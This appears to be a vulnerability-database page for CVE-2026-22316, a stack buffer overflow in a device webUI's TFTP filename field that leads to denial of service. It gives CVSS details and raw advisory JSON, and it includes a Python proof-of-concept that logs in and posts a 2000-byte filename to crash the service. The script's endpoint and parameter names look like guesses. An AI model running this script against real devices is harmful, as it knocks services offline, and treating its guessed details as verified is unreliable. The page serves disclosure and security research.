Security Vulnerability Report
中文
CVE-2026-22316 CVSS 6.5 MEDIUM

CVE-2026-22316

Published: 2026-03-18 08:16:27
Last Modified: 2026-03-18 14:52:44
Source: [email protected]

Description

A remote attacker with user privileges for the webUI can use the setting of the TFTP Filename with a POST Request to trigger a stack-based Buffer Overflow, resulting in a DoS attack.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

支持TFTP功能的webUI设备(未修补版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-22316 PoC - TFTP Filename Buffer Overflow Note: This is a conceptual PoC for educational purposes only. """ import requests import sys def exploit_tftp_buffer_overflow(target_url, username, password): """ Attempt to trigger buffer overflow via oversized TFTP filename parameter """ # Create session and authenticate session = requests.Session() login_data = { 'username': username, 'password': password } try: # Login to webUI session.post(target_url + '/login', data=login_data, timeout=10) # Generate oversized TFTP filename to trigger overflow # Typical stack buffer size is 256-1024 bytes overflow_payload = 'A' * 2000 # 2000 bytes overflow # Send malicious POST request with oversized TFTP filename exploit_data = { 'tftp_filename': overflow_payload, 'action': 'set' } response = session.post( target_url + '/api/tftp/settings', data=exploit_data, timeout=10 ) print(f"[*] Request sent to {target_url}") print(f"[*] Payload length: {len(overflow_payload)}") print(f"[*] Response status: {response.status_code}") # Check if service is still responsive (DoS indicator) if response.status_code == 500 or response.status_code == 0: print("[+] Potential DoS condition detected") return True except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password>") print(f"Example: {sys.argv[0]} http://192.168.1.1 admin password") sys.exit(1) exploit_tftp_buffer_overflow(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22316", "sourceIdentifier": "[email protected]", "published": "2026-03-18T08:16:27.070", "lastModified": "2026-03-18T14:52:44.227", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A remote attacker with user privileges for the webUI can use the setting of the TFTP Filename with a POST Request to trigger a stack-based Buffer Overflow, resulting in a DoS attack."}, {"lang": "es", "value": "Un atacante remoto con privilegios de usuario para la webUI puede usar la configuración del nombre de archivo TFTP con una solicitud POST para desencadenar un desbordamiento de búfer basado en pila, lo que resulta en un ataque de DoS."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-104", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.